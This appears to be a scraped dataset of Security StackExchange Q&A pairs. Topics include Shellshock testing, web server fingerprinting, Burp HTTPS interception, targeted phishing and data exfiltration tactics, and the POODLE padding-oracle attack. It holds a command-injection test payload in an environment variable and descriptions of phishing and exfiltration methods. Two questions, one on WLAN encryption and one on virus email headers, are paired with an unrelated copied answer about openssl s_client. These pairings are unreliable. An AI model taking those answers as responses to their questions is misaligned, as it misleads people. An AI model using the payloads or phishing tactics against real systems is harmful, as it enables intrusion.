68,123 | I've recently heard via Twitter about CVE-2014-6271. Are ordinary OS X desktops, that aren't acting as a web server, at risks of receiving attacks that could exploit this vulnerability? | Define "risk". The core of this attack is to create an environment variable that looks like a Bash scripting function but ends with the invocation of a program, and then cause Bash to be run. Bash will see the environment variable, parse it, and then keep parsing past the end of the function and run the program. Any method of triggering Bash execution with at least one attacker-controlled environment variable will work. Web server CGI attacks are getting the attention right now, but a user logging in over SSH could do it (a failed login, however, can't). It's possible that some FTP servers could trigger it (say, through running a post-upload script). A PackageMaker-based installer could trigger it, but if you're running a hostile installer, you've got bigger problems than this. There are probably many other ways as well. The average desktop user doing average desktop user activities is unlikely to have open attack vectors that could be used to trigger this bug, but Bash shows up in enough unexpected places that it's impossible to say for sure. | {
"source": [
"https://security.stackexchange.com/questions/68123",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/8335/"
]
} |
68,168 | I did apt-get update; apt-get upgrade -y on all systems I'm running. I'm not sure if my /etc/apt/sources.list is good enough on all of these systems. I would like to quickly check each system again, ideally with a one-line shell command. Does such a one-line shell command exist and if so, what is it? Note this question is mainly about CVE-2014-6271. | Is my bash vulnerable? This simple command is a sufficient test to see if your version of bash is vulnerable: x='() { :;}; echo VULNERABLE' bash -c : It's not necessary to have extra text printed to signify that the command has actually run, because patched versions of bash will report a warning when a variable in its starting environment contains exploit code for the patched vulnerability. On a vulnerable system: $ x='() { :;}; echo VULNERABLE' bash -c :
VULNERABLE On a patched system: $ x='() { :;}; echo VULNERABLE' bash -c :
bash: warning: x: ignoring function definition attempt
bash: error importing function definition for `x' For a detailed explanation of what this does and does not test for, and why, see "Other Function Parsing Bugs" below. Is my system vulnerable? If your bash isn't vulnerable then your system isn't vulnerable. If your bash is vulnerable, then your system is vulnerable inasmuch as it uses bash along attack vectors such as CGI scripts, DHCP clients and restricted SSH accounts. Check whether /bin/sh is bash or some other shell. The vulnerability is in a bash-specific feature and other shells such as dash and ksh are not affected. You can test the default shell by running the same test as above with sh instead of bash : x='() { :;}; echo VULNERABLE' sh -c : If you see an error message, then your system has a patched bash and isn't vulnerable. If you see VULNERABLE , then your system's default shell is bash and all attack vectors are a concern. If you see no output, then your system's default shell is not bash, and only parts of your system that use bash are vulnerable. Check for: Scripts executed by bash (starting with #!/bin/bash , not #!/bin/sh ) from CGI or by a DHCP client. Restricted SSH accounts whose shell is bash. How This Test Works It runs the command bash -c : with the literal text () { :;}; echo VULNERABLE set as the value of the environment variable x . The : builtin performs no action ; it's used here where a non-empty command is required. bash -c : creates an instance of bash that runs : and exits. Even this is sufficient to allow the vulnerability to be triggered. Even though bash is being invoked to run only one command (and that command is a no-op), it still reads its environment and interprets each variable whose contents start with () { as a function (at least those whose names are valid function names) and runs it so the function will be defined. The intent behind this behavior of bash is to run only a function definition, which makes a function available for use but doesn't actually run the code inside it. () { :;} is the definition for a function that performs no action when called. A space is required after { so that { is parsed as a separate token. A ; or newline is required before } for it to be accepted as correct syntax. See 3.3 Shell Functions in the Bash Reference Manual for more information on the syntax for defining shell functions in bash. But note that the syntax used (and recognized) by bash as a valid exported shell function whose definition it should run is more restrictive: It must start with the exact string () { , with exactly one space between ) and { . And while shell functions occasionally have their compound statement enclosed in ( ) instead of { } , they are still exported inside { } syntax. Variables whose contents start with () ( instead of () { will not test for or otherwise trigger the vulnerability. bash should stop executing code after the closing } . But (unless patched) it doesn't! This is the wrong behavior that constitutes CVE-2014-6271 ("Shellshock"). ; ends the statement that defines the function, allowing subsequent text to be read and run as a separate command. And the text after ; doesn't have to be another function definition--it can be anything at all. In this test, the command after ; is echo VULNERABLE . The leading space before echo does nothing and is present just for readability. The echo command writes text to standard output . The full behavior of echo is actually somewhat complicated, but that's unimportant here: echo VULNERABLE is simple. It displays the text VULNERABLE . Since echo VULNERABLE is only run if bash is unpatched and running code after function definitions in environment variables, this (and many other tests similar to it) is an effective test of whether or not the installed bash is vulnerable to CVE-2014-6271. Other Function Parsing Bugs (and why that test and those like it don't check for them) The patch that has been released as of this writing, and the commands described and explained above for checking vulnerability, apply to the very severe bug known as CVE-2014-6271. Neither this patch nor the commands described above for checking vulnerability apply to the related bug CVE-2014-7169 (nor should they be assumed to apply to any other bugs that may not yet have been discovered or disclosed). The bug CVE-2014-6271 arose from a combination of two problems: bash accepts function definitions in arbitrary environment variables, and while doing so, bash continues running any code that exists after the closing brace ( } ) of a function definition. As of this writing, the existing fix for CVE-2014-6271 that has been released (and rolled out by many downstream vendors)--that is, the fix you'd get by updating your system or by applying the existing patch manually--is a fix for 2 . But in the presence of other mistakes in bash's code, 1 is potentially a source of many additional parsing bugs. And we know at least one other such bug exists--specifically, CVE-2014-7169 . The command presented in this answer tests for whether or not an installed bash is patched with the existing (i.e., first official) fix for CVE-2014-6271. It tests vulnerability to that specific parsing bug : "GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables[...]" That specific bug is extremely severe--and the available patch does fix it--while CVE-2014-7169 appears to be less severe but is definitely still cause for concern. As Stéphane Chazelas ( discoverer of the Shellshock bug ) has recently explained in an answer to When was the shellshock (CVE-2014-6271) bug introduced, and what is the patch that fully fixes it? on Unix.SE : There is a patch that prevents bash from interpreting anything else
than the function definition in there
( https://lists.gnu.org/archive/html/bug-bash/2014-09/msg00081.html ),
and that's the one that has been applied in all the security updates
from the various Linux distributions. However, bash still interprets the code in there and any bug in the
interpreter could be exploited. One such bug has already been
found (CVE-2014-7169) though its impact is a lot smaller. So there will be
another patch coming soon. But if that's what the exploit looks like... Some people, here and elsewhere, have asked why x='() { :;}; echo VULNERABLE' bash -c : printing VULNERABLE (or similar) should be considered alarming. And I've recently seen the misconception circulating that because you have to have interactive shell access already to type in that particular command and press enter , Shellshock must somehow not be a serious vulnerability. Although some of the sentiments I've heard expressed--that we should not rush to panic, that desktop users behind NAT routers shouldn't put their lives on hold to build bash from source code--are quite correct, confusing the vulnerability itself with the ability to test for it by running some specific command (such as the command presented here) is a serious mistake. The command given in this post is an answer to the question, "Is there a short command to test if my server is secure against the shellshock bash bug?" It is not an answer to "What does shellshock look like when it's used against me by a real attacker?" and it is not an answer to the question, "What does someone have to do to successfully exploit this bug?" (And it is also not an answer to, "Is there a simple command to infer from all technical and social factors if I'm personally at high risk?") That command is a test, to see if bash will execute code written, in a particular way, in arbitrary environment variables. The Shellshock vulnerability is not x='() { :;}; echo VULNERABLE' bash -c : . Instead, that command (and others like it) is a diagnostic to help determine if one is affected by Shellshock. Shellshock has wide ranging consequences, though it is true that the risk is almost certainly less for desktop users who are not running remotely accessible network servers. (How much less is something I don't think we know at this point.) In contrast, the command x='() { :;}; echo VULNERABLE' bash -c : is entirely inconsequential except insofar as it is useful for testing for Shellshock (specifically, for CVE-2014-6271). For those who are interested, here are a few resources with information on why this bug is considered severe and why environment variables, particularly on network servers, may contain untrusted data capable of exploiting the bug and causing harm: Re: CVE-2014-6271: remote code execution through bash (Florian Weimer, Wed, 24 Sep 2014 17:03:19 +0200) Bash Code Injection Vulnerability via Specially Crafted Environment Variables (CVE-2014-6271, CVE-2014-7169) What is a specific example of how the Shellshock Bash bug could be exploited? Attack scenarios of the new Bash vulnerability CVE-2014-6271 Bash Vulnerability example kasperd's answer to What does env x='() { :;}; command' bash do and why is it insecure? What is the severity of the new bash exploit (shellshock)? To further illustrate the conceptual distinction here, consider two hypotheticals: Imagine if instead of suggesting x='() { :;}; echo VULNERABLE' bash -c : as the test, I had suggested bash --version as the test. (That would actually not be particularly appropriate, because OS vendors frequently backport security patches to older versions of software. The version information a program gives you can, on some systems, make it look like the program would be vulnerable, when actually it has been patched.) If testing by running bash --version were being suggested, no one would say, "But attackers can't sit at my computer and type bash --version , so I must be fine!" This is the distinction between a test and the problem being tested for. Imagine if an advisory were issued suggesting that your car might have some safety problem, such as airbag failure or bursting into flames in a collision, and that factory demonstrations had been streamed. No one would say, "But I would never accidentally drive or tow my car 900 miles to the factory and have it loaded with an expensive crash dummy and slammed into a concrete wall. So I must be fine!" This is the distinction between a test and the problem being tested for. | {
"source": [
"https://security.stackexchange.com/questions/68168",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/36782/"
]
} |
68,536 | I'm trying to detect what web server a particular website uses. For instance whether it's nginX, Apache, Tomcat and so on. I usually use Live HTTP Headers Firefox add-on. The problem is that sites sometimes hide their back-end. Isn't there a way to detect web servers when they're not present in HEADER? EDIT 1: A sample output from a website that didn't match to any of the @Question Overflow 's answer: HTTP/1.1 200 OK
Date: Mon, 29 Sep 2014 10:43:29 GMT
Content-Type: text/html
Transfer-Encoding: chunked
X-Powered-By: VideoHosting Framework/1.0.1
Cache-Control: no-cache, must-revalidate, no-cache="Set-Cookie", private
Content-Encoding: gzip
Vary: Accept-Encoding
Server: Videohost/1.0.1 I even tried to use httprint on linux but it gives ICMP request timeout on every website I tested. EDIT 2: The above HEADER is very similar to a website that I'm sure it uses nginX.
If we remove those parts that are not present ( Connection , Pragma and so on) in the above HEADER, it gets so similar to nginX. I suppose Server is at the end of the response because they have customized it themeselves. And because of that nginX appended it to the end of the Response packet. HTTP/1.1 200 OK
Server: nginx
Date: Mon, 29 Sep 2014 12:51:37 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Encoding: gzip OWASP should update its list with this one as well for nginX. ;-) | If a website does not use a custom built server to modify the HTTP headers, you can try by examining the order of arrangement in the HTTP response fields. From OWASP : Apache 1.3.23 server: HTTP/1.1 200 OK
Date: ...
Server: ...
Last-Modified: ...
ETag: ...
Accept-Ranges: bytes
Content-Length: ...
Connection: ...
Content-Type: text/HTML Microsoft IIS 5.0 server: HTTP/1.1 200 OK
Server: ...
Expires: ...
Date: ...
Content-Type: text/HTML
Accept-Ranges: bytes
Last-Modified: ...
ETag: ...
Content-Length: ... Netscape Enterprise 4.1 server: HTTP/1.1 200 OK
Server: ...
Date: ...
Content-type: text/HTML
Last-modified: ...
Content-length: ...
Accept-ranges: bytes
Connection: ... SunONE 6.1 server: HTTP/1.1 200 OK
Server: ...
Date: ...
Content-length: ...
Content-type: text/html
Date: ...
Last-Modified: ...
Accept-Ranges: bytes
Connection: ... For further confirmation, you can send a malformed request , such as GET / HTTP/3.0 , to elicit a non-standard response. Example: Apache 1.3.23 and SunONE 6.1 servers: HTTP/1.1 400 Bad Request Microsoft IIS 5.0 server: HTTP/1.1 200 OK Netscape Enterprise 4.1 server: HTTP/1.1 505 HTTP Version Not Supported As the above information is pretty outdated, you may want to install a pentesting tool like httprint for automated web server fingerprinting . Web servers can obfuscate their signature or masquerade themselves as another server. Take the information with a pinch of salt, if you must. | {
"source": [
"https://security.stackexchange.com/questions/68536",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/6142/"
]
} |
68,638 | I'm doing some research on the App of my telephone operator. I started Burp Suite on my Mac in proxy mode, then I opened up the App on my iPhone and started to sniff some traffic. I pressed the "login" button and this happened: My username and my password are there, in plaintext.
The connection is actually HTTPS, but if it's HTTPS, why can I read my username and password as plaintext parameters in the POST request? Is this normal? I also tried to replicate the login process with a curl command, and it works only if I use the -k parameter that skip the SSL certificate validation. What's going on here? | Burp Suite in proxy mode is able to decrypt HTTPS traffic of any systems which trust it. It does this by generating an own certificate and use this cert to register itself as a certificate authority on the system it is installed on. When it then proxies a request to a HTTPS webserver, it does the HTTPS handshake itself, decrypts the traffic, issues a certificate for the webserver signed by itself as a certificate authority, uses that certificate to re-encrypt the traffic and send both the forged certificate and the re-encrypted data to the client. This allows Burp Suite to eavesdrop on HTTPS traffic. A user which uses a normal proxy server or doesn't trust the Burp Suite pseudo-CA would not have their credentials compromised. | {
"source": [
"https://security.stackexchange.com/questions/68638",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/56712/"
]
} |
68,975 | It is often said that security tools such as firewalls, antivirus programs, etc. are only effective against random, untargeted attacks. If you are specifically targeted by an intentional, professional attacker (e.g. state sponsored, NSA, Chinese state attacker, or competitor looking to steal trade secrets) then most of these protections are useless. Is this true? If it is true, then what tools or techniques make a targeted attack from a professional attacker different? Does the attacker have a significant advantage over me? What strategies can I employ to reduce the risk of a successful attack? | Disclaimer: I work at a company developing security software to mitigate against targeted attacks. Some of the methods we use are similar to those used by attackers (when clients want to test their systems). For example, one client asked us to test their security by doing targeted [spear] phishing attacks. We emailed only the IT department with a combination of 2 emails. One was an apparently mis-addressed email to the board with a link to a Pdf named something like Executive bonus summary.pdf , the other purported to be a new external portal for the company to use during the Olympics ("Please check your domain credentials work correctly..."). With a quick search on social media, we could've made user-specific emails but that would be time consuming and ultimately wasn't necessary. We registered a domain name that was visually similar to the target's, then used it to host fake pages (styled identically to the real ones) and send DKIM signed emails (to avoid spam filters). Of the techies targeted, 43% gave us their corporate login details, 54% tried to download the bogus pdf (the pdf was just garbage bytes so it looked like a corrupt download. One guy tried 5 times using Firefox, IE and finally wget). We were told that only one user had detected the attack and reported it to management (but only after giving us their credentials). So... Getting into the company is not impossible. As for getting information out, our normal sales pitch includes a demo of us bypassing company firewalls/traditional DLP . I don't believe we've ever failed unless they're air-gapped or using a good data diode (although the rate of exfiltration varies. In one case, we had a restrictive white-listing firewall, so had the software encode documents into images and keep updating a profile picture on Google. Then we watched the profile externally and downloaded each chunk). That said, we've found time and again that software can be worked around but users are consistently the weakest link. So to answer your question, a targeted attack includes the personal touch. Custom websites designed to trick users, research into what software (and release) is being used to check for known vulnerabilities, investigations on social media, social engineering, etc, etc. Another one worth considering although less common is bribery/blackmail. If you're talking about state actors, it's not inconceivable. | {
"source": [
"https://security.stackexchange.com/questions/68975",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/44376/"
]
} |
69,187 | The following quote is from the CompTIA Security+ guide: Single sign-on enhances security by requiring users to use and remember only one set of credentials for authentication. How is that enhancing security ? The way I see it is that it's rather a single point of failure. Isn't it more secure to have multiple different passwords for different accounts/services ? | The idea with a good single sign on is that there are fewer places for your credentials to be compromised. There are three reasons to use different passwords, first, because each unique place that stores your password (hopefully hashed) is another place it could get compromised. Second, because if your password is compromised, any other account using it would need to be updated and that is hard to do. Third because if your password is compromised, they could access multiple accounts if they were shared. SSO is a great advantage for the first two. A good SSO system should only store your account credentials in one location (which is hopefully far more fortified). All authentication is done against this one store. If your account is compromised, rather than having many places to update, only one password has to be changed and one account locked down. It doesn't particularly address the third concern, but it makes compromise less likely in the first place. Additionally, depending on the account, different passwords don't necessarily act as much of a barrier. There are plenty of reported examples of attackers using one compromised account to chain from account to account until they can get to the actual account they want. (For example, if they can access your e-mail account, then they can use password resets.) A good system of reporting compromises and allowing for the account to be locked down can make a decent help towards mitigating the risk though when suspicious activity is detected. The argument that completely unique credentials may be more secure than a good SSO setup is possibly valid, but in the real world, most people reuse credentials. SSO mitigates much of the risk of this behavior while still allowing the convenience people want. | {
"source": [
"https://security.stackexchange.com/questions/69187",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/31356/"
]
} |
69,195 | Quoting from CompTIA Security+ guide The first factor of authentication ( something you know , such as password or PIN) is the weakest factor. Why? it makes sense when we say that humans/users are the weakest factor in any system from security point of view as we humans forget, make mistakes and break easily. But it makes no sense (to me a least) that getting kidnapped and tortured (in order to give up my password) is more likely to happen than me losing a smart card or a key fob? | In the typical case, something you are and something you have can only be true for one person at a time. If you lose your token, you know you have lost it. Something you know can be copied by someone without your knowledge. If someone has your password, you may not be able to tell that they are actively exploiting that knowledge. That is one reason to change your password regularly. It shortens the window where a password breach could be exploited. | {
"source": [
"https://security.stackexchange.com/questions/69195",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/31356/"
]
} |
69,279 | I understand they are an attack on crypto algorithms as implemented on various processors, but how do they work? The online papers are too complex for me to understand. | "Fault attacks" are something you do on some hardware: that is in your physical hands, but is shielded against intrusion ("tamper resistant"), and does computations with values that you don't know but would like to ("cryptographic keys"). Example of such hardware are smart cards . A classic scenario would be: you have a smart card for a satellite-TV decoder; you got the card through a normal subscription to the broadcaster; you wish to make 3000 copies of that card so that you may resell them to people who want free/cheap TV. People do that. A fault attack is when you induce the shielded hardware to get things wrong by changing its environment. For instance, you try to run the card in an oven, at a temperature which is beyond the nominal operating temperature of the card. The attacker's hope is that by analysing what the card returns when it failed, he may gain some insight on the secret values stored in the card (this is of course very specific to what the card computes and how things are implemented in that card). A low-voltage fault attack is a fault attack where the fault is induced by feeding the hardware with a lower-than-normal voltage (in the "smart card" model, the card has its own CPU, RAM and ROM, but the current and clock signals are provided externally, i.e. are under the control of the attacker). For instance, if the card expect 3.3V, you give it only 2V. The real trick here is that the attacker can lower the voltage for only very short durations, a few clock cycles, so as to induce a fault in a specific part of the algorithm execution. | {
"source": [
"https://security.stackexchange.com/questions/69279",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/31356/"
]
} |
69,407 | If people use a password to log in to a UNIX server, then it could be forced to expire the password, then they change it. If people use an ssh key and have no passwords, no password expiry, then nothing forces them to change their SSH key regularly. Question: Which solution is more secure? Why do the "howto"'s for hardening a server always advise to use an ssh key, not passwords? UPDATE : not counting the brute-force weakness - regarding passwords, since they could be guessed if there is no Fail2ban-like solution. | Both keys and passwords have their pros and cons. The reason that "howtos" and the like advise using the SSH key is that they find their cons less worrisome than passwords' cons. SSH keys are long and complex, far more than any password could be. But as you state, they don't have expiry, and they sit on disk where they can be stolen from. On the other hand, they don't get transmitted to the remote system (except key forwarding, natch) which passwords need to be. Passwords are generally, predictably, unavoidably weak. While it is possible to have strong passwords, time and again it has been shown that people will use weak passwords and have poor password practices... short, simple, word-based, simple patterns ("p@ssw0rd!"), write them down, use them on multiple sites, base them on their phone number, their children's birthdate, their own name. You point out that keys don't expire, but why do passwords expire? To ensure that a brute-force attack is less likely to crack a password before it's been replaced. Not an issue that impacts keys. And, bad passwords aside, even "good" passwords are vulnerable to brute-force (online or offline) under the right conditions. They have to get transmitted to the other system, or to any other place that the user can be fooled into sending them by mistake. The balance of evidence strongly suggests that passwords are weaker and keys are stronger. | {
"source": [
"https://security.stackexchange.com/questions/69407",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/56819/"
]
} |
70,501 | I'm going to print some business cards, and along with my email address I was thinking of putting my PGP ID on it as well. After doing some research I found that using the short ID is not a good idea. What is the best way of doing this - or should I forget about it? | Considering that your public key is only usable by a computer 1 ; you can remove clutter from your business card by having all electronic data accessible online and referred to by a QR code . The link could refer to a vCard file stored on, say, a public Dropbox. As the vCard format can store any business or contact information including OpenPGP keys . Alternately a high resolution QR code could store the entire public key on the back of your business card. Which has certain security advantages. 1. Hand ciphers notwithstanding. | {
"source": [
"https://security.stackexchange.com/questions/70501",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/22488/"
]
} |
70,645 | I used to work in a small office which provided basic desktop support for users. One day I had to answer a call from a very angry customer and he asked for my boss. He wanted to know how could one email slip through their spam filter/network-based antivirus software (if there is such a thing, that's what he claimed), and the attachment got filtered/caught by the antivirus software on his desktop. Till I could reach my boss I had to tell him that a spam filter is not flawless/perfect and sometimes one email mange to pass. Also to support my claims, I explained to him Gmail themselves allowed that email to attachment despite that his antivirus software had detected and removed it. Was my explanation right? How would a security expert deal with this situation? | Your answer is pretty OK, but you could explain the ongoing "game" between spammers and spamfilters a bit more. This makes it understandable why some spam always will find its way to the customer. Spam filters try to catch all mail that is spam. Spammers try to create mails that are trusted not to be spam - both by spam filters and by humans. For spammers, this comes down to creating mails that... can pass spam filters; when arrived in the inbox look like legit email so the user opens it; and then is interesting enough so users click on the link inside to buy something or have malware installed. Spammers buy spam filters, and test their new spam tactics to see if their mail passes the filter. If the mail passes, they are one step ahead. Then they go out in the wild, send out millions of mails, effectively showing their new tactic. The spam-filter makers notice, and they update their filter. This is an ongoing game. It's similar in the virus industry. When you see spam that has no links or attachments, it is probably spam to poison filters, to confuse filters, to make it easier to fool them later on. | {
"source": [
"https://security.stackexchange.com/questions/70645",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/31356/"
]
} |
70,719 | Canonical question regarding the recently disclosed padding oracle vulnerability in SSL v3. Other identical or significantly similar questions should be closed as a duplicate of this one. What is the POODLE vulnerability? I use [ product / browser ]. Am I affected? Is [ product ] vulnerable to the POODLE attack? What do I need to do to secure my [ product ] with respect to this vulnerability? How do I detect POODLE attacks on my network? Are there any known POODLE attacks? References: Google security announcement POODLE Whitepaper (PDF) | What is the Poodle vulnerability ? The "Poodle" vulnerability, released on October 14th, 2014 , is an attack on the SSL 3.0 protocol. It is a protocol flaw, not an implementation issue; every implementation of SSL 3.0 suffers from it. Please note that we are talking about the old SSL 3.0, not TLS 1.0 or later. The TLS versions are not affected (neither is DTLS). In a nutshell: when SSL 3.0 uses a block cipher in CBC mode, the encryption process for a record uses padding so that the data length is a multiple of the block size. For instance, suppose that 3DES is used, with 8-byte blocks. A MAC is computed over the record data (and the record sequence number, and some other header data) and appended to the data. Then 1 to 8 bytes are appended, so that the total length is a multiple of 8. Moreover, if n bytes are added at that step, then the last of these bytes must have value n-1 . This is made so that decryption works. Consider the decryption of a record: 3DES-CBC decryption is applied, then the very last byte is inspected: it should contain a value between 0 and 7, and that tells us how many other bytes were added for padding. These bytes are removed, and, crucially, their contents are ignored . This is the important point: there are bytes in the record that can be changed without the recipient minding in the slightest way. The Poodle attack works in a chosen-plaintext context, like BEAST and CRIME before it. The attacker is interested in data that gets protected with SSL, and he can: inject data of their own before and after the secret value that he wants to obtain; inspect, intercept and modify the resulting bytes on the wire. The main and about only plausible scenario where such conditions are met is a Web context: the attacker runs a fake WiFi access point, and injects some Javascript of their own as part of a Web page (HTTP, not HTTPS) that the victim browses. The evil Javascript makes the browser send requests to a HTTPS site (say, a bank Web site) for which the victim's browser has a cookie . The attacker wants that cookie. The attack proceeds byte-by-byte. The attacker's Javascript arranges for the request to be such that the last cookie byte occurs at the end of an encryption block (one of the 8-byte blocks of 3DES) and such that the total request length implies a full-block padding. Suppose that the last 8 cookie bytes have values c 0 , c 1 , ... c 7 . Upon encryption, CBC works like this: So if the previous encrypted block is e 0 , e 1 , ... e 7 , then what enters 3DES is c 0 XOR e 0 , c 1 XOR e 1 , ... c 7 XOR e 7 . The e i values are known to the attacker (that's the encrypted result). Then, the attacker, from the outside, replaces the last block of the encrypted record with a copy of the block that contains the last cookie byte. To understand what happens, you have to know how CBC decryption works: The last ciphertext block thus gets decrypted, which yields a value ending with c 7 XOR e 7 . That value is then XORed with the previous encrypted block. If the result ends with a byte of value 7 (that works with probability 1/256), then the padding removal step will remove the last 8 bytes, and end up with the intact cleartext and MAC, and the server will be content. Otherwise, either the last byte will not be in the 0..7 range, and the server will complain, or the last byte will be between 0 and 6, and the server will remove the wrong number of bytes, and the MAC will not match, and the server will complain. In other words, the attacker can observe the server's reaction to know whether the CBC decryption result found a 7, or something else. When a 7 is obtained, the last cookie byte is immediately revealed. When the last cookie byte is obtained, the process is executed again with the previous byte, and so on. The core point is that SSL 3.0 is defined as ignoring the padding bytes (except the last). These bytes are not covered by the MAC and don't have any defined value. TLS 1.0 is not vulnerable because in TLS 1.0, the protocol specifies that all padding bytes must have the same value, and libraries implementing TLS verify that these bytes have the expected values. Thus, our attacker cannot get lucky with probability 1/256 (2 -8 ), but with probability 1/18446744073709551616 (2 -64 ), which is substantially worse. I use [product] . Am I affected? Is [product] vulnerable to the Poodle attack ? The attack scenario requires the attacker to be able to inject data of their own, and to intercept the encrypted bytes. The only plausible context where such a thing happens is a Web browser, as explained above. In that case, Poodle is, like BEAST and CRIME, an attack on the client , not on the server. If [product] is a Web browser, then you may be affected. But that also depends on the server. The protocol version used is a negotiation between client and server; SSL 3.0 will happen only if the server agrees. Thus, you might consider that your server is "vulnerable" if it allows SSL 3.0 to be used (this is technically incorrect, since the attack is client-side in a Web context, but I expect SSL-security-meters to work that way). Conditions for the vulnerability to occur: SSL 3.0 supported, and selection of a CBC-based cipher suite (RC4 encryption has no padding, thus is not vulnerable to that specific attack -- but RC4 has other issues, of course). Workarounds: Disable SSL 3.0 support in the client. Disable SSL 3.0 support in the server. Disable support for CBC-based cipher suites when using SSL 3.0 (in either client or server). Implement that new SSL/TLS extension to detect when some active attacker is breaking connections to force your client and server to use SSL 3.0, even though both know TLS 1.0 or better. Both client and server must implement it. Any of these four solutions avoids the vulnerability. What do I need to do to secure my [product] with respect to this vulnerability? Same as always. Your vendor publishes security fixes; install them . Install the patches. All the patches. Do that. For Poodle and for all other vulnerabilities. You cannot afford not to install them, and that is not new . You should already be doing that. If you do not install the patches then Níðhöggr will devour your spleen. How do I detect Poodle attacks on my network? You don't ! Since the most probable attack setup involves the attacker luring the victim on their network, not yours. Although, on the server side, you may want to react on an inordinate amount of requests that fail on a decryption error. Not all server software will log events for such cases, but this should be within the possibilities of any decent IDS system. Are there any known Poodle attacks? Not to my knowledge. In fact, when you control all the external I/O of the victim, it is still considerably easier to simply lure the poor sod on a fake copy of their bank site. Cryptographic attacks are neat, but they involve more effort than exploiting the bottomless well of user's gullibility. | {
"source": [
"https://security.stackexchange.com/questions/70719",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/2264/"
]
} |
70,733 | In order to mitigate the "Poodle" vulnerability , I'd like to disable SSLv3 support in my (in this case, TLS, rather than HTTPS) server. How can I use openssl s_client to verify that I've done this? | OpenSSL s_client To check if you have disabled the SSLv3 support, then run the following openssl s_client -connect example.com:443 -ssl3 which should produce something like 3073927320:error:14094410:SSL routines:SSL3_READ_BYTES:sslv3 alert handshake failure:s3_pkt.c:1258:SSL alert number 40
3073927320:error:1409E0E5:SSL routines:SSL3_WRITE_BYTES:ssl handshake failure:s3_pkt.c:596: meaning SSLv3 is disabled on the server. Otherwise the connection will established successfully. Nmap Alternatively, you can use nmap to scan server for supported version: # nmap --script ssl-enum-ciphers example.com
Starting Nmap 6.47 ( http://nmap.org ) at 2014-10-15 03:19 PDT
Nmap scan report for example.com (203.0.113.100)
Host is up (0.090s latency).
rDNS record for 203.0.113.100: edge.example.com
Not shown: 997 filtered ports
PORT STATE SERVICE
80/tcp open http
443/tcp open https
| ssl-enum-ciphers:
| **SSLv3: No supported ciphers found**
| TLSv1.0: | {
"source": [
"https://security.stackexchange.com/questions/70733",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/27877/"
]
} |
70,742 | I'm looking at ways an outsider (i.e. someone without a possible password) of the network could sniff the communication within the network, specifically focusing on WLAN. This is what I understand about wireless network security: When we connect to an open wireless access point (so, with WEP) it is possible to sniff the communication (but we can't decrypt SSL-encrypted connections). To make it impossible for outsiders to sniff network, we could use WPA(2) or the like, but in any case this will require to password-protect the network. This is what I understand about SSL: When we use for example HTTPS (so HTTP with SSL), it isn't possible for attackers to see the data that is being communicated over the connection (unless a malicious certificate has been trusted ). When we connect to a server using HTTPS, we do not need to enter a passphrase. Say I'd like to create an open Wi-Fi hotspot that encrypts the data in such a way that no one can sniff the communication of other users of the hotspot. This is, as far as I know, not possible (is that correct?). But then, why isn't it possible to encrypt the communication with the wireless access point using a technique like SSL? SSL doesn't require a passphrase, but guarantees nobody can sniff the line. Is there something essential about SSL that makes it impossible to use it for such an application? | OpenSSL s_client To check if you have disabled the SSLv3 support, then run the following openssl s_client -connect example.com:443 -ssl3 which should produce something like 3073927320:error:14094410:SSL routines:SSL3_READ_BYTES:sslv3 alert handshake failure:s3_pkt.c:1258:SSL alert number 40
3073927320:error:1409E0E5:SSL routines:SSL3_WRITE_BYTES:ssl handshake failure:s3_pkt.c:596: meaning SSLv3 is disabled on the server. Otherwise the connection will established successfully. Nmap Alternatively, you can use nmap to scan server for supported version: # nmap --script ssl-enum-ciphers example.com
Starting Nmap 6.47 ( http://nmap.org ) at 2014-10-15 03:19 PDT
Nmap scan report for example.com (203.0.113.100)
Host is up (0.090s latency).
rDNS record for 203.0.113.100: edge.example.com
Not shown: 997 filtered ports
PORT STATE SERVICE
80/tcp open http
443/tcp open https
| ssl-enum-ciphers:
| **SSLv3: No supported ciphers found**
| TLSv1.0: | {
"source": [
"https://security.stackexchange.com/questions/70742",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/-1/"
]
} |
70,756 | I'm seeing a virus in our network with some strange headers. Sometimes they are coming (sourced) from a netscaler VIP, other times they seem to come from an Exchange hub server. How do I determine the origin of this virus? (workstation, etc) I'm thinking that this has to do with special authentication of the receive connector (MX Exchange auth?) that allows acceptance of the message. Received: from EXMB01.company.com ([xxxx:66bb]) by EXHUB02.company.com ([2.2.2.192]) with mapi id 14.03.0195.001; Wed, 15 Oct 2014 09:55:26 -0400
Content-Type: application/ms-tnef; name="winmail.dat"
Content-Transfer-Encoding: binary
From: "Dale Chip" <[email protected]>
Subject: Unpaid invoic
Thread-Topic: Unpaid invoic
Thread-Index: Ac/of6pWLOgzgrBLQM2EB7owtQTxYw==
Date: Wed, 15 Oct 2014 09:55:25 -0400
Message-ID: <[email protected]>
Accept-Language: en-US
Content-Language: en-US
X-MS-Has-Attach: yes
X-MS-Exchange-Organization-SCL: -1
X-MS-TNEF-Correlator: <[email protected]>
MIME-Version: 1.0
X-MS-Exchange-Organization-AuthSource: HUB02.company.com
X-MS-Exchange-Organization-AuthAs: Internal
X-MS-Exchange-Organization-AuthMechanism: 04
X-Originating-IP: [2.2.2.171]
X-Auto-Response-Suppress: DR, RN, NRN, OOF, AutoReply
X-MS-Exchange-Organization-Recipient-P2-Type: Bcc | OpenSSL s_client To check if you have disabled the SSLv3 support, then run the following openssl s_client -connect example.com:443 -ssl3 which should produce something like 3073927320:error:14094410:SSL routines:SSL3_READ_BYTES:sslv3 alert handshake failure:s3_pkt.c:1258:SSL alert number 40
